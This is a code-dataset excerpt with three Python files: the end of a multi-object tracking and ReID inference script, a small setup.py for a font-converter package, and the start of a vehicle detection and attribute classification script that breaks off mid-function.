np_score_list.append(\n self.predictor.get_output_handle(output_names[out_idx])\n .copy_to_cpu())\n np_boxes_list.append(\n self.predictor.get_output_handle(output_names[\n out_idx + num_outs]).copy_to_cpu())\n if add_timer:\n self.det_times.inference_time_s.end(repeats=repeats)\n self.det_times.postprocess_time_s.start()\n\n # postprocess\n self.picodet_postprocess = PicoDetPostProcess(\n inputs['image'].shape[2:],\n inputs['im_shape'],\n inputs['scale_factor'],\n strides=self.pred_config.fpn_stride,\n nms_threshold=self.pred_config.nms['nms_threshold'])\n boxes, boxes_num = self.picodet_postprocess(np_score_list,\n np_boxes_list)\n\n if len(boxes) == 0:\n pred_dets = np.zeros((1, 6), dtype=np.float32)\n pred_xyxys = np.zeros((1, 4), dtype=np.float32)\n else:\n pred_dets, pred_xyxys = self.postprocess(boxes, ori_image_shape,\n threshold)\n if add_timer:\n self.det_times.postprocess_time_s.end()\n self.det_times.img_num += 1\n\n return pred_dets, pred_xyxys\n\n\nclass SDE_ReID(object):\n \"\"\"\n ReID of SDE methods\n\n Args:\n pred_config (object): config of model, defined by `Config(model_dir)`\n model_dir (str): root path of model.pdiparams, model.pdmodel and infer_cfg.yml\n device (str): Choose the device you want to run, it can be: CPU/GPU/XPU, default is CPU\n run_mode (str): mode of running(fluid/trt_fp32/trt_fp16)\n batch_size (int): size of per batch in inference, default 50 means at most\n 50 sub images can be made a batch and send into ReID model\n trt_min_shape (int): min shape for dynamic shape in trt\n trt_max_shape (int): max shape for dynamic shape in trt\n trt_opt_shape (int): opt shape for dynamic shape in trt\n trt_calib_mode (bool): If the model is produced by TRT offline quantitative\n calibration, trt_calib_mode need to set True\n cpu_threads (int): cpu threads\n enable_mkldnn (bool): whether to open MKLDNN\n \"\"\"\n\n def __init__(self,\n pred_config,\n model_dir,\n device='CPU',\n run_mode='fluid',\n batch_size=50,\n trt_min_shape=1,\n trt_max_shape=1088,\n trt_opt_shape=608,\n trt_calib_mode=False,\n cpu_threads=1,\n enable_mkldnn=False):\n self.pred_config = pred_config\n self.predictor, self.config = load_predictor(\n model_dir,\n run_mode=run_mode,\n batch_size=batch_size,\n min_subgraph_size=self.pred_config.min_subgraph_size,\n device=device,\n use_dynamic_shape=self.pred_config.use_dynamic_shape,\n trt_min_shape=trt_min_shape,\n trt_max_shape=trt_max_shape,\n trt_opt_shape=trt_opt_shape,\n trt_calib_mode=trt_calib_mode,\n cpu_threads=cpu_threads,\n enable_mkldnn=enable_mkldnn)\n self.det_times = Timer()\n self.cpu_mem, self.gpu_mem, self.gpu_util = 0, 0, 0\n self.batch_size = batch_size\n assert pred_config.tracker, \"Tracking model should have tracker\"\n pt = pred_config.tracker\n max_age = pt['max_age'] if 'max_age' in pt else 30\n max_iou_distance = pt[\n 'max_iou_distance'] if 'max_iou_distance' in pt else 0.7\n self.tracker = DeepSORTTracker(\n max_age=max_age, max_iou_distance=max_iou_distance)\n\n def get_crops(self, xyxy, ori_img):\n w, h = self.tracker.input_size\n self.det_times.preprocess_time_s.start()\n crops = []\n xyxy = xyxy.astype(np.int64)\n ori_img = ori_img.transpose(1, 0, 2) # [h,w,3]->[w,h,3]\n for i, bbox in enumerate(xyxy):\n crop = ori_img[bbox[0]:bbox[2], bbox[1]:bbox[3], :]\n crops.append(crop)\n crops = preprocess_reid(crops, w, h)\n self.det_times.preprocess_time_s.end()\n\n return crops\n\n def preprocess(self, crops):\n # to keep fast speed, only use topk crops\n crops = crops[:self.batch_size]\n inputs = {}\n inputs['crops'] = np.array(crops).astype('float32')\n return inputs\n\n def postprocess(self, pred_dets, pred_embs):\n tracker = self.tracker\n tracker.predict()\n online_targets = tracker.update(pred_dets, pred_embs)\n\n online_tlwhs, online_scores, online_ids = [], [], []\n for t in online_targets:\n if not t.is_confirmed() or t.time_since_update > 1:\n continue\n tlwh = t.to_tlwh()\n tscore = t.score\n tid = t.track_id\n if tlwh[2] * tlwh[3] <= tracker.min_box_area:\n continue\n if tracker.vertical_ratio > 0 and tlwh[2] / tlwh[\n 3] > tracker.vertical_ratio:\n continue\n online_tlwhs.append(tlwh)\n online_scores.append(tscore)\n online_ids.append(tid)\n\n tracking_outs = {\n 'online_tlwhs': online_tlwhs,\n 'online_scores': online_scores,\n 'online_ids': online_ids,\n }\n return tracking_outs\n\n def postprocess_mtmct(self, pred_dets, pred_embs, frame_id, seq_name):\n tracker = self.tracker\n tracker.predict()\n online_targets = tracker.update(pred_dets, pred_embs)\n\n online_tlwhs, online_scores, online_ids = [], [], []\n online_tlbrs, online_feats = [], []\n for t in online_targets:\n if not t.is_confirmed() or t.time_since_update > 1:\n continue\n tlwh = t.to_tlwh()\n tscore = t.score\n tid = t.track_id\n if tlwh[2] * tlwh[3] <= tracker.min_box_area:\n continue\n if tracker.vertical_ratio > 0 and tlwh[2] / tlwh[\n 3] > tracker.vertical_ratio:\n continue\n online_tlwhs.append(tlwh)\n online_scores.append(tscore)\n online_ids.append(tid)\n\n online_tlbrs.append(t.to_tlbr())\n online_feats.append(t.feat)\n\n tracking_outs = {\n 'online_tlwhs': online_tlwhs,\n 'online_scores': online_scores,\n 'online_ids': online_ids,\n 'feat_data': {},\n }\n for _tlbr, _id, _feat in zip(online_tlbrs, online_ids, online_feats):\n feat_data = {}\n feat_data['bbox'] = _tlbr\n feat_data['frame'] = f\"{frame_id:06d}\"\n feat_data['id'] = _id\n _imgname = f'{seq_name}_{_id}_{frame_id}.jpg'\n feat_data['imgname'] = _imgname\n feat_data['feat'] = _feat\n tracking_outs['feat_data'].update({_imgname: feat_data})\n return tracking_outs\n\n def predict(self,\n crops,\n pred_dets,\n repeats=1,\n add_timer=True,\n MTMCT=False,\n frame_id=0,\n seq_name=''):\n # preprocess\n if add_timer:\n self.det_times.preprocess_time_s.start()\n inputs = self.preprocess(crops)\n input_names = self.predictor.get_input_names()\n for i in range(len(input_names)):\n input_tensor = self.predictor.get_input_handle(input_names[i])\n input_tensor.copy_from_cpu(inputs[input_names[i]])\n\n if add_timer:\n self.det_times.preprocess_time_s.end()\n self.det_times.inference_time_s.start()\n\n # model prediction\n for i in range(repeats):\n self.predictor.run()\n output_names = self.predictor.get_output_names()\n feature_tensor = self.predictor.get_output_handle(output_names[0])\n pred_embs = feature_tensor.copy_to_cpu()\n if add_timer:\n self.det_times.inference_time_s.end(repeats=repeats)\n self.det_times.postprocess_time_s.start()\n\n # postprocess\n if MTMCT == False:\n tracking_outs = self.postprocess(pred_dets, pred_embs)\n else:\n tracking_outs = self.postprocess_mtmct(pred_dets, pred_embs,\n frame_id, seq_name)\n if add_timer:\n self.det_times.postprocess_time_s.end()\n self.det_times.img_num += 1\n\n return tracking_outs\n\n\ndef predict_image(detector, reid_model, image_list):\n image_list.sort()\n for i, img_file in enumerate(image_list):\n frame = cv2.imread(img_file)\n ori_image_shape = list(frame.shape[:2])\n if FLAGS.run_benchmark:\n # warmup\n pred_dets, pred_xyxys = detector.predict(\n [img_file],\n ori_image_shape,\n FLAGS.threshold,\n FLAGS.scaled,\n repeats=10,\n add_timer=False)\n # run benchmark\n pred_dets, pred_xyxys = detector.predict(\n [img_file],\n ori_image_shape,\n FLAGS.threshold,\n FLAGS.scaled,\n repeats=10,\n add_timer=True)\n\n cm, gm, gu = get_current_memory_mb()\n detector.cpu_mem += cm\n detector.gpu_mem += gm\n detector.gpu_util += gu\n print('Test iter {}, file name:{}'.format(i, img_file))\n else:\n pred_dets, pred_xyxys = detector.predict(\n [img_file], ori_image_shape, FLAGS.threshold, FLAGS.scaled)\n\n if len(pred_dets) == 1 and np.sum(pred_dets) == 0:\n print('Frame {} has no object, try to modify score threshold.'.\n format(i))\n online_im = frame\n else:\n # reid process\n crops = reid_model.get_crops(pred_xyxys, frame)\n\n if FLAGS.run_benchmark:\n # warmup\n tracking_outs = reid_model.predict(\n crops, pred_dets, repeats=10, add_timer=False)\n # run benchmark \n tracking_outs = reid_model.predict(\n crops, pred_dets, repeats=10, add_timer=True)\n\n else:\n tracking_outs = reid_model.predict(crops, pred_dets)\n\n online_tlwhs = tracking_outs['online_tlwhs']\n online_scores = tracking_outs['online_scores']\n online_ids = tracking_outs['online_ids']\n\n online_im = plot_tracking(\n frame, online_tlwhs, online_ids, online_scores, frame_id=i)\n\n if FLAGS.save_images:\n if not os.path.exists(FLAGS.output_dir):\n os.makedirs(FLAGS.output_dir)\n img_name = os.path.split(img_file)[-1]\n out_path = os.path.join(FLAGS.output_dir, img_name)\n cv2.imwrite(out_path, online_im)\n print(\"save result to: \" + out_path)\n\n\ndef predict_video(detector, reid_model, camera_id):\n if camera_id != -1:\n capture = cv2.VideoCapture(camera_id)\n video_name = 'mot_output.mp4'\n else:\n capture = cv2.VideoCapture(FLAGS.video_file)\n video_name = os.path.split(FLAGS.video_file)[-1]\n # Get Video info : resolution, fps, frame count\n width = int(capture.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT))\n fps = int(capture.get(cv2.CAP_PROP_FPS))\n frame_count = int(capture.get(cv2.CAP_PROP_FRAME_COUNT))\n print(\"fps: %d, frame_count: %d\" % (fps, frame_count))\n\n if not os.path.exists(FLAGS.output_dir):\n os.makedirs(FLAGS.output_dir)\n out_path = os.path.join(FLAGS.output_dir, video_name)\n if not FLAGS.save_images:\n video_format = 'mp4v'\n fourcc = cv2.VideoWriter_fourcc(*video_format)\n writer = cv2.VideoWriter(out_path, fourcc, fps, (width, height))\n frame_id = 0\n timer = MOTTimer()\n results = defaultdict(list)\n id_set = set()\n interval_id_set = set()\n in_id_list = list()\n out_id_list = list()\n prev_center = dict()\n records = list()\n entrance = [0, height / 2., width, height / 2.]\n video_fps = fps\n\n while (1):\n ret, frame = capture.read()\n if not ret:\n break\n timer.tic()\n ori_image_shape = list(frame.shape[:2])\n pred_dets, pred_xyxys = detector.predict([frame], ori_image_shape,\n FLAGS.threshold, FLAGS.scaled)\n\n if len(pred_dets) == 1 and np.sum(pred_dets) == 0:\n print('Frame {} has no object, try to modify score threshold.'.\n format(frame_id))\n timer.toc()\n im = frame\n else:\n # reid process\n crops = reid_model.get_crops(pred_xyxys, frame)\n tracking_outs = reid_model.predict(crops, pred_dets)\n\n online_tlwhs = tracking_outs['online_tlwhs']\n online_scores = tracking_outs['online_scores']\n online_ids = tracking_outs['online_ids']\n\n results[0].append(\n (frame_id + 1, online_tlwhs, online_scores, online_ids))\n # NOTE: just implement flow statistic for one class\n result = (frame_id + 1, online_tlwhs, online_scores, online_ids)\n statistic = flow_statistic(\n result, FLAGS.secs_interval, FLAGS.do_entrance_counting,\n video_fps, entrance, id_set, interval_id_set, in_id_list,\n out_id_list, prev_center, records)\n id_set = statistic['id_set']\n interval_id_set = statistic['interval_id_set']\n in_id_list = statistic['in_id_list']\n out_id_list = statistic['out_id_list']\n prev_center = statistic['prev_center']\n records = statistic['records']\n\n timer.toc()\n\n fps = 1. / timer.duration\n im = plot_tracking(\n frame,\n online_tlwhs,\n online_ids,\n online_scores,\n frame_id=frame_id,\n fps=fps,\n do_entrance_counting=FLAGS.do_entrance_counting,\n entrance=entrance)\n\n if FLAGS.save_images:\n save_dir = os.path.join(FLAGS.output_dir, video_name.split('.')[-2])\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n cv2.imwrite(\n os.path.join(save_dir, '{:05d}.jpg'.format(frame_id)), im)\n else:\n writer.write(im)\n\n frame_id += 1\n print('detect frame:%d, fps: %f' % (frame_id, fps))\n\n if camera_id != -1:\n cv2.imshow('Tracking Detection', im)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n if FLAGS.save_mot_txts:\n result_filename = os.path.join(FLAGS.output_dir,\n video_name.split('.')[-2] + '.txt')\n write_mot_results(result_filename, results)\n\n result_filename = os.path.join(\n FLAGS.output_dir, video_name.split('.')[-2] + '_flow_statistic.txt')\n f = open(result_filename, 'w')\n for line in records:\n f.write(line)\n print('Flow statistic save in {}'.format(result_filename))\n f.close()\n\n if FLAGS.save_images:\n save_dir = os.path.join(FLAGS.output_dir, video_name.split('.')[-2])\n cmd_str = 'ffmpeg -f image2 -i {}/%05d.jpg {}'.format(save_dir,\n out_path)\n os.system(cmd_str)\n print('Save video in {}.'.format(out_path))\n else:\n writer.release()\n\n\ndef predict_mtmct_seq(detector, reid_model, seq_name, output_dir):\n fpath = os.path.join(FLAGS.mtmct_dir, seq_name)\n if os.path.exists(os.path.join(fpath, 'img1')):\n fpath = os.path.join(fpath, 'img1')\n\n assert os.path.isdir(fpath), '{} should be a directory'.format(fpath)\n image_list = os.listdir(fpath)\n image_list.sort()\n assert len(image_list) > 0, '{} has no images.'.format(fpath)\n\n results = defaultdict(list)\n mot_features_dict = {} # cid_tid_fid feats\n print('Totally {} frames found in seq {}.'.format(\n len(image_list), seq_name))\n\n for frame_id, img_file in enumerate(image_list):\n if frame_id % 40 == 0:\n print('Processing frame {} of seq {}.'.format(frame_id, seq_name))\n frame = cv2.imread(os.path.join(fpath, img_file))\n ori_image_shape = list(frame.shape[:2])\n frame_path = os.path.join(fpath, img_file)\n pred_dets, pred_xyxys = detector.predict([frame_path], ori_image_shape,\n FLAGS.threshold, FLAGS.scaled)\n\n if len(pred_dets) == 1 and np.sum(pred_dets) == 0:\n print('Frame {} has no object, try to modify score threshold.'.\n format(frame_id))\n online_im = frame\n else:\n # reid process\n crops = reid_model.get_crops(pred_xyxys, frame)\n\n tracking_outs = reid_model.predict(\n crops,\n pred_dets,\n MTMCT=True,\n frame_id=frame_id,\n seq_name=seq_name)\n\n feat_data_dict = tracking_outs['feat_data']\n mot_features_dict = dict(mot_features_dict, **feat_data_dict)\n\n online_tlwhs = tracking_outs['online_tlwhs']\n online_scores = tracking_outs['online_scores']\n online_ids = tracking_outs['online_ids']\n\n online_im = plot_tracking(frame, online_tlwhs, online_ids,\n online_scores, frame_id)\n results[0].append(\n (frame_id + 1, online_tlwhs, online_scores, online_ids))\n\n if FLAGS.save_images:\n save_dir = os.path.join(output_dir, seq_name)\n if not os.path.exists(save_dir): os.makedirs(save_dir)\n img_name = os.path.split(img_file)[-1]\n out_path = os.path.join(save_dir, img_name)\n cv2.imwrite(out_path, online_im)\n\n if FLAGS.save_mot_txts:\n result_filename = os.path.join(output_dir, seq_name + '.txt')\n write_mot_results(result_filename, results)\n\n return mot_features_dict\n\n\ndef predict_mtmct(detector, reid_model, mtmct_dir, mtmct_cfg):\n MTMCT = mtmct_cfg['MTMCT']\n assert MTMCT == True, 'predict_mtmct should be used for MTMCT.'\n\n cameras_bias = mtmct_cfg['cameras_bias']\n cid_bias = parse_bias(cameras_bias)\n scene_cluster = list(cid_bias.keys())\n\n # 1.zone releated parameters\n use_zone = mtmct_cfg['use_zone']\n zone_path = mtmct_cfg['zone_path']\n\n # 2.tricks parameters, can be used for other mtmct dataset\n use_ff = mtmct_cfg['use_ff']\n use_rerank = mtmct_cfg['use_rerank']\n\n # 3.camera releated parameters\n use_camera = mtmct_cfg['use_camera']\n use_st_filter = mtmct_cfg['use_st_filter']\n\n # 4.zone releated parameters\n use_roi = mtmct_cfg['use_roi']\n roi_dir = mtmct_cfg['roi_dir']\n\n mot_list_breaks = []\n cid_tid_dict = dict()\n\n output_dir = FLAGS.output_dir\n if not os.path.exists(output_dir): os.makedirs(output_dir)\n\n seqs = os.listdir(mtmct_dir)\n seqs.sort()\n\n for seq in seqs:\n fpath = os.path.join(mtmct_dir, seq)\n if os.path.isfile(fpath) and _is_valid_video(fpath):\n ext = seq.split('.')[-1]\n seq = seq.split('.')[-2]\n print('ffmpeg processing of video {}'.format(fpath))\n frames_path = video2frames(\n video_path=fpath, outpath=mtmct_dir, frame_rate=25)\n fpath = os.path.join(mtmct_dir, seq)\n\n if os.path.isdir(fpath) == False:\n print('{} is not a image folder.'.format(fpath))\n continue\n\n mot_features_dict = predict_mtmct_seq(detector, reid_model, seq,\n output_dir)\n\n cid = int(re.sub('[a-z,A-Z]', \"\", seq))\n tid_data, mot_list_break = trajectory_fusion(\n mot_features_dict,\n cid,\n cid_bias,\n use_zone=use_zone,\n zone_path=zone_path)\n mot_list_breaks.append(mot_list_break)\n # single seq process\n for line in tid_data:\n tracklet = tid_data[line]\n tid = tracklet['tid']\n if (cid, tid) not in cid_tid_dict:\n cid_tid_dict[(cid, tid)] = tracklet\n\n map_tid = sub_cluster(\n cid_tid_dict,\n scene_cluster,\n use_ff=use_ff,\n use_rerank=use_rerank,\n use_camera=use_camera,\n use_st_filter=use_st_filter)\n\n pred_mtmct_file = os.path.join(output_dir, 'mtmct_result.txt')\n if use_camera:\n gen_res(pred_mtmct_file, scene_cluster, map_tid, mot_list_breaks)\n else:\n gen_res(\n pred_mtmct_file,\n scene_cluster,\n map_tid,\n mot_list_breaks,\n use_roi=use_roi,\n roi_dir=roi_dir)\n\n if FLAGS.save_images:\n camera_results, cid_tid_fid_res = get_mtmct_matching_results(\n pred_mtmct_file)\n\n crops_dir = os.path.join(output_dir, 'mtmct_crops')\n save_mtmct_crops(\n cid_tid_fid_res, images_dir=mtmct_dir, crops_dir=crops_dir)\n\n save_dir = os.path.join(output_dir, 'mtmct_vis')\n save_mtmct_vis_results(\n camera_results,\n images_dir=mtmct_dir,\n save_dir=save_dir,\n save_videos=FLAGS.save_images)\n\n # evalution metrics\n data_root_gt = os.path.join(mtmct_dir, '..', 'gt', 'gt.txt')\n if os.path.exists(data_root_gt):\n print_mtmct_result(data_root_gt, pred_mtmct_file)\n\n\ndef main():\n pred_config = PredictConfig(FLAGS.model_dir)\n detector_func = 'SDE_Detector'\n if pred_config.arch == 'PicoDet':\n detector_func = 'SDE_DetectorPicoDet'\n\n detector = eval(detector_func)(pred_config,\n FLAGS.model_dir,\n device=FLAGS.device,\n run_mode=FLAGS.run_mode,\n batch_size=FLAGS.batch_size,\n trt_min_shape=FLAGS.trt_min_shape,\n trt_max_shape=FLAGS.trt_max_shape,\n trt_opt_shape=FLAGS.trt_opt_shape,\n trt_calib_mode=FLAGS.trt_calib_mode,\n cpu_threads=FLAGS.cpu_threads,\n enable_mkldnn=FLAGS.enable_mkldnn)\n\n pred_config = PredictConfig(FLAGS.reid_model_dir)\n reid_model = SDE_ReID(\n pred_config,\n FLAGS.reid_model_dir,\n device=FLAGS.device,\n run_mode=FLAGS.run_mode,\n batch_size=FLAGS.reid_batch_size,\n trt_min_shape=FLAGS.trt_min_shape,\n trt_max_shape=FLAGS.trt_max_shape,\n trt_opt_shape=FLAGS.trt_opt_shape,\n trt_calib_mode=FLAGS.trt_calib_mode,\n cpu_threads=FLAGS.cpu_threads,\n enable_mkldnn=FLAGS.enable_mkldnn)\n\n # predict from video file or camera video stream\n if FLAGS.video_file is not None or FLAGS.camera_id != -1:\n predict_video(detector, reid_model, FLAGS.camera_id)\n\n elif FLAGS.mtmct_dir is not None:\n mtmct_cfg_file = FLAGS.mtmct_cfg\n with open(mtmct_cfg_file) as f:\n mtmct_cfg = yaml.safe_load(f)\n predict_mtmct(detector, reid_model, FLAGS.mtmct_dir, mtmct_cfg)\n\n else:\n # predict from image\n img_list = get_test_images(FLAGS.image_dir, FLAGS.image_file)\n predict_image(detector, reid_model, img_list)\n\n if not FLAGS.run_benchmark:\n detector.det_times.info(average=True)\n reid_model.det_times.info(average=True)\n else:\n mode = FLAGS.run_mode\n det_model_dir = FLAGS.model_dir\n det_model_info = {\n 'model_name': det_model_dir.strip('/').split('/')[-1],\n 'precision': mode.split('_')[-1]\n }\n bench_log(detector, img_list, det_model_info, name='Det')\n\n reid_model_dir = FLAGS.reid_model_dir\n reid_model_info = {\n 'model_name': reid_model_dir.strip('/').split('/')[-1],\n 'precision': mode.split('_')[-1]\n }\n bench_log(reid_model, img_list, reid_model_info, name='ReID')\n\n\nif __name__ == '__main__':\n paddle.enable_static()\n parser = argsparser()\n FLAGS = parser.parse_args()\n print_arguments(FLAGS)\n FLAGS.device = FLAGS.device.upper()\n assert FLAGS.device in ['CPU', 'GPU', 'XPU'\n ], \"device should be CPU, GPU or XPU\"\n\n main()\n"} {"ext": "py", "sha": "1a311118f207b109f72b04552b596740dc758fae", "content": "#!usr/bin/env python3\n# -*- coding:utf-8 _*-\n\n\nfrom setuptools import setup\n\nsetup(name='font-converter',\n version='0.1',\n description='A font converter script',\n url='http://github.com/5uw1st/font-converter',\n author='5uw1st',\n author_email='j5uw1st@gmail.com',\n license='MIT',\n packages=['font_converter'],\n python_requires=\">=3.6\",\n install_requires=[\n 'requests==2.20.1',\n 'redis==3.3.8',\n 'pytesseract==0.3.0',\n 'Pillow==6.1.0',\n ],\n zip_safe=False)\n"} {"ext": "py", "sha": "1a3111bea352c6ee26d9cdeef4033302e248a38e", "content": "# coding: utf-8\r\n\r\nimport os\r\nimport sys\r\nimport re\r\nimport time\r\nimport pickle\r\nimport shutil\r\nimport random\r\nimport argparse\r\n\r\nfrom darknet_util import *\r\nfrom darknet import Darknet\r\nfrom preprocess import prep_image, process_img, inp_to_image\r\nfrom dataset import color_attrs, direction_attrs, type_attrs\r\n\r\nimport torch\r\nimport torchvision\r\nimport paramiko\r\nimport cv2\r\nimport numpy as np\r\nimport PIL\r\nfrom PIL import Image\r\nfrom matplotlib import pyplot as plt\r\nfrom matplotlib.widgets import Cursor\r\nfrom matplotlib.image import AxesImage\r\nfrom scipy.spatial.distance import cityblock\r\nfrom tqdm import tqdm\r\n\r\n# -------------------------------------\r\n# for matplotlib to displacy chinese characters correctly\r\nfrom pylab import *\r\nmpl.rcParams['font.sans-serif'] = ['SimHei']\r\n\r\nuse_cuda = True # True\r\nos.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\ndevice = torch.device(\r\n 'cuda: 0' if torch.cuda.is_available() and use_cuda else 'cpu')\r\n\r\nif use_cuda:\r\n torch.manual_seed(0)\r\n torch.cuda.manual_seed_all(0)\r\nprint('=> device: ', device)\r\n\r\nlocal_model_path = './checkpoints/epoch_39.pth'\r\nlocal_car_cfg_path = './car.cfg'\r\nlocal_car_det_weights_path = './car_detect.weights'\r\n\r\n\r\n\r\nclass Cls_Net(torch.nn.Module):\r\n \"\"\"\r\n vehicle multilabel classification model\r\n \"\"\"\r\n\r\n def __init__(self, num_cls, input_size):\r\n \"\"\"\r\n network definition\r\n :param is_freeze:\r\n \"\"\"\r\n torch.nn.Module.__init__(self)\r\n\r\n # output channels\r\n self._num_cls = num_cls\r\n\r\n # input image size\r\n self.input_size = input_size\r\n\r\n # delete original FC and add custom FC\r\n self.features = torchvision.models.resnet18(pretrained=True)\r\n del self.features.fc\r\n # print('feature extractor:\\n', self.features)\r\n\r\n self.features = torch.nn.Sequential(\r\n *list(self.features.children()))\r\n\r\n self.fc = torch.nn.Linear(512 ** 2, num_cls) # 输出类别数\r\n # print('=> fc layer:\\n', self.fc)\r\n\r\n def forward(self, X):\r\n \"\"\"\r\n :param X:\r\n :return:\r\n \"\"\"\r\n N = X.size()[0]\r\n\r\n X = self.features(X) # extract features\r\n\r\n X = X.view(N, 512, 1 ** 2)\r\n X = torch.bmm(X, torch.transpose(X, 1, 2)) / (1 ** 2) # Bi-linear CNN\r\n\r\n X = X.view(N, 512 ** 2)\r\n X = torch.sqrt(X + 1e-5)\r\n X = torch.nn.functional.normalize(X)\r\n X = self.fc(X)\r\n assert X.size() == (N, self._num_cls)\r\n return X\r\n\r\n\r\n# ------------------------------------- vehicle detection model\r\nclass Car_Classifier(object):\r\n \"\"\"\r\n vehicle detection model mabager\r\n \"\"\"\r\n\r\n def __init__(self,\r\n num_cls,\r\n model_path=local_model_path):\r\n \"\"\"\r\n load model and initialize\r\n \"\"\"\r\n\r\n # define model and load weights\r\n self.net = Cls_Net(num_cls=num_cls, input_size=224).to(device)\r\n # self.net = torch.nn.DataParallel(Net(num_cls=20, input_size=224),\r\n # device_ids=[0]).to(device)\r\n self.net.load_state_dict(torch.load(model_path))\r\n print('=> vehicle classifier loaded from %s' % model_path)\r\n\r\n # set model to eval mode\r\n self.net.eval()\r\n\r\n # test data transforms\r\n self.transforms = torchvision.transforms.Compose([\r\n torchvision.transforms.Resize(size=224),\r\n torchvision.transforms.CenterCrop(size=224),\r\n torchvision.transforms.ToTensor(),\r\n torchvision.transforms.Normalize(mean=(0.485, 0.456, 0.406),\r\n std=(0.229, 0.224, 0.225))\r\n ])\r\n\r\n # split each label\r\n self.color_attrs = color_attrs\r\n print('=> color_attrs:\\n', self.color_attrs)\r\n\r\n self.direction_attrs = direction_attrs\r\n print('=> direction attrs:\\n', self.direction_attrs)\r\n\r\n self.type_attrs = type_attrs\r\n print('=> type_attrs:\\n', self.type_attrs)\r\n\r\n def get_predict(self, output):\r\n \"\"\"\r\n get prediction from output\r\n \"\"\"\r\n # get each label's prediction from output\r\n output = output.cpu() # fetch data from gpu\r\n pred_color = output[:, :9]\r\n pred_direction = output[:, 9:11]\r\n pred_type = output[:, 11:]\r\n\r\n color_idx = pred_color.max(1, keepdim=True)[1]\r\n direction_idx = pred_direction.max(1, keepdim=True)[1]\r\n type_idx = pred_type.max(1, keepdim=True)[1]\r\n pred = torch.cat((color_idx, direction_idx, type_idx), dim=1)\r\n return pred\r\n\r\n def pre_process(self, image):\r\n \"\"\"\r\n image formatting\r\n :rtype: PIL.JpegImagePlugin.JpegImageFile\r\n \"\"\"\r\n # image data formatting\r\n if type(image) == np.ndarray:\r\n if image.shape[2] == 3: # turn all 3 channels to RGB format\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n elif image.shape[2] == 1: # turn 1 channel to RGB\r\n image = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)\r\n\r\n # turn numpy.ndarray into PIL.Image\r\n image = Image.fromarray(image)\r\n elif type(image) == PIL.JpegImagePlugin.JpegImageFile:\r\n if image.mode == 'L' or image.mode == 'I': # turn 8bits or 32bits into 3 channels RGB\r\n image = image.convert('RGB')\r\n\r\n return image\r\n\r\n def predict(self, img):\r\n \"\"\"\r\n predict vehicle attributes by classifying\r\n :return: vehicle color, direction and type \r\n \"\"\"\r\n # image pre-processing\r\n img = self.transforms(img)\r\n img = img.view(1, 3, 224, 224)\r\n\r\n # put image data into device\r\n img = img.to(device)\r\n\r\n # calculating inference\r\n output = self.net.forward(img)\r\n\r\n # get result\r\n # self.get_predict_ce, return pred to host side(cpu)\r\n pred = self.get_predict(output)\r\n color_name = self.color_attrs[pred[0][0]]\r\n direction_name = self.direction_attrs[pred[0][1]]\r\n type_name = self.type_attrs[pred[0][2]]\r\n\r\n return color_name, direction_name, type_name\r\n\r\n\r\nclass Car_DC():\r\n def __init__(self,\r\n src_dir,\r\n dst_dir,\r\n car_cfg_path=local_car_cfg_path,\r\n car_det_weights_path=local_car_det_weights_path,\r\n inp_dim=768,\r\n prob_th=0.2,\r\n nms_th=0.4,\r\n num_classes=1):\r\n \"\"\"\r\n model initialization\r\n \"\"\"\r\n # super parameters\r\n self.inp_dim = inp_dim\r\n self.prob_th = prob_th\r\n self.nms_th = nms_th\r\n self.num_classes = num_classes\r\n self.dst_dir = dst_dir\r\n\r\n # clear dst_dir\r\n if os.path.exists(self.dst_dir):\r\n for x in os.listdir(self.dst_dir):\r\n if x.endswith('.jpg'):\r\n os.remove(self.dst_dir + '/' + x)\r\n else:\r\n os.makedirs(self.dst_dir)\r\n\r\n # initialize vehicle detection model\r\n self.detector = Darknet(car_cfg_path)\r\n self.detector.load_weights(car_det_weights_path)\r\n # set input dimension of image\r\n self.detector.net_info['height'] = self.inp_dim\r\n self.detector.to(device)\r\n self.detector.eval() # evaluation mode\r\n print('=> car detection model initiated.')\r\n\r\n # initiate multilabel classifier\r\n self.classifier = Car_Classifier(num_cls=19,\r\n model_path=local_model_path)\r\n\r\n # initiate imgs_path\r\n self.imgs_path = [os.path.join(src_dir, x) for x in os.listdir(\r\n src_dir) if x.endswith('.jpg')]\r\n\r\n def cls_draw_bbox(self, output, orig_img):\r\n \"\"\"\r\n 1. predict vehicle's attributes based on bbox of vehicle\r\n 2. draw bbox to orig_img\r\n \"\"\"\r\n labels = []\r\n pt_1s = []\r\n pt_2s = []\r\n\r\n # 1\r\n for det in output:\r\n # rectangle points\r\n pt_1 = tuple(det[1:3].int()) # the left-up point\r\n pt_2 = tuple(det[3:5].int()) # the right down point\r\n pt_1s.append(pt_1)\r\n pt_2s.append(pt_2)\r\n\r\n # turn BGR back to RGB\r\n ROI = Image.fromarray(\r\n orig_img[pt_1[1]: pt_2[1],\r\n pt_1[0]: pt_2[0]][:, :, ::-1])\r\n # ROI.show()\r\n\r\n # call classifier to predict\r\n car_color, car_direction, car_type = self.classifier.predict(ROI)\r\n label = str(car_color + ' ' + car_direction + ' ' + car_type)\r\n labels.append(label)\r\n print('=> predicted label: ', label)\r\n\r\n # 2\r\n color = (0, 215, 255)\r\n for i, det in enumerate(output):\r\n pt_1 = pt_1s[i]\r\n pt_2 = pt_2s[i]\r\n\r\n # draw bounding box\r\n cv2.rectangle(orig_img, pt_1, pt_2, color, thickness=2)\r\n\r\n # get str text size\r\n txt_size = cv2.getTextSize(\r\n label, cv2.FONT_HERSHEY_PLAIN, 2, 2)[0]\r\n # pt_2 = pt_1[0] + txt_size[0] + 3, pt_1[1] + txt_size[1] + 5\r\n pt_2 = pt_1[0] + txt_size[0] + 3, pt_1[1] - txt_size[1] - 5\r\n\r\n # draw text background rect\r\n cv2.rectangle(orig_img, pt_1, pt_2, color, thickness=-1) # text\r\n\r\n # draw text\r\n cv2.putText(orig_img, labels[i], (pt_1[0], pt_1[1]), # pt_1[1] + txt_size[1] + 4\r\n cv2.FONT_HERSHEY_PLAIN, 2, [225, 255, 255], 2)\r\n\r\n def process_predict(self,\r\n prediction,\r\n prob_th,\r\n num_cls,\r\n 